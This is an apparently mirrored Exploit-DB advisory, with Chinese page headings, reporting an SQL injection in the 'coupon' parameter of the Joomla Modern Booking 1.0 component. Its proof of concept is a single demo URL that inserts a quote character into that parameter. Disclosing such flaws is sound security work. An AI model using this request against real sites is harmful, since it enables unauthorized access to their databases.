Joomla! Component Modern Booking 1.0 – ‘coupon’ SQL Injection

  • 作者: Hamed Izadi
    日期: 2017-03-22
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/41673/
  • ###############################################################################################
# Exploit Title: Joomla Modern Booking- SQL Injection

 # Author: [ Hamed Izadi ]

#IRAN

# Vendor Homepage :
https://extensions.joomla.org/extensions/extension/vertical-markets/booking-a-reservations/modern-booking/
# Vendor Homepage : https://www.unikalus.com/
# Category: [ Webapps ]
# Tested on: [ Ubuntu ]
# Versions: 1.0
# Date: March 22, 2017


# PoC:
# coupon Parameter Vulnerable To SQLi

# Demo:
# https://server/modern-booking-slots?task=saveorder&coupon=test"&start=&option=com_modern_booking


#L u Arg
###############################################################################################